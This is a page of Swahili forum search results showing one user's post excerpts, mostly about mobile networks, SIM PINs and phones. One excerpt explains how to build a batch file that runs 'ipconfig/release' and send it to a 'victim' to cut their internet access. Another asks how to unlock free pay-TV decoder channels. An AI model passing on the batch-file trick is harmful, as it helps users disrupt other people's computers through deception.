Search results

  1. MTAtiro grandson

    Mafundi decoder naomba tukutane hapa

    Kwa anaejua jinsi ya kukifanya king'amuzi cha startime kionyeshe channel zote free atupe maujuzi maana huku mtaani kwetu kuna majamaa wanapita nyumba hadi nyumba kufanya iyo kitu kwa buku teni
  2. MTAtiro grandson

    Hatma ya maisha yako unayo mwenyewe

    Twende pamoja na Mimi Je, ulishawahi kujiuliza kuwa kwanini kila mtoto mdogo anayezaliwa anakuwa amekunja ngumi? Hii ni kwasasabu HATIMA yake anayo mwenyewe. Katika kulitambua hili Kuna Mambo ya msingi ya kufahamu: 1. Unaweza kukutana na Mambo magumu sana sana na ya kukatisha tamaa anayeweza...
  3. MTAtiro grandson

    Anayejua ubora wa simu aina ya Vivo

    Bora hata tecno kuliko hiyo vivo
  4. MTAtiro grandson

    Naomba msaada jinsi ya kurudisha muamala wangu Airtel Money

    Hapo haitarud nusu saa imeshapita kama vipi kaushia tu alafu acha kubet fanya kazi hayo ndo madhara ya betting
  5. MTAtiro grandson

    Hizi pin code za halotel zinaboa kinyama

    Kwa sasa ukisajil laini mpya lazima iwe na pin code ni agizo kutoka tcra sawa
  6. MTAtiro grandson

    Tigo asanteni sana

    Hahahahaha mnapitwa na ving jaman
  7. MTAtiro grandson

    Hizi pin code za halotel zinaboa kinyama

    Ndio najua mim mpaka nishaga change zile zao nkaweka mpya ila kuweka off inazngua et pin code error
  8. MTAtiro grandson

    Tigo asanteni sana

    Unapiga *147*23# ndo unapata hiyo ofa ila kwa baadhi ya lain mpka iwe ya mda kidogo mim lain yangu ina miaka 9 saiv
  9. MTAtiro grandson

    Tigo asanteni sana

    Ni Tigo jaman hiyo natumia saiv
  10. MTAtiro grandson

    Hizi pin code za halotel zinaboa kinyama

    Mim ninayo ya airtel tokea mwaka jana imegoma na jana nimesajil halotel na yenyewe ikanambia hivyo hivyo pin error
  11. MTAtiro grandson

    Tigo asanteni sana

    Naona Tigo wamerekebisha vifurushi vyao
  12. MTAtiro grandson

    Hizi pin code za halotel zinaboa kinyama

    Hazitoki hizo pin kama umezikuta kwenye lain mpya ukiweka off inaandika pin error
  13. MTAtiro grandson

    Niulize chochote kuhusu Wi-Fi

    Nipe ip adress yako
  14. MTAtiro grandson

    Jinsi ya kuzuia computer ya mtu isiingie kwenye internet

    Kwa simu haifanyi kazi Ndio ni kwa email
  15. MTAtiro grandson

    Jinsi ya kuzuia computer ya mtu isiingie kwenye internet

    Fungua Notepad kisha andika au copy and paste command ifuatayo:- echo off Ipconfig/release Save as Tzhacker.bat unaweza ukasave kwa kutumia jina lolote ila cha muhimu ni .bat, (Something.bat) Kisha mtumie mtu unaetaka kumuharibia internet ya computer yake (your victim), pindi atakapo lifungua...
Top Bottom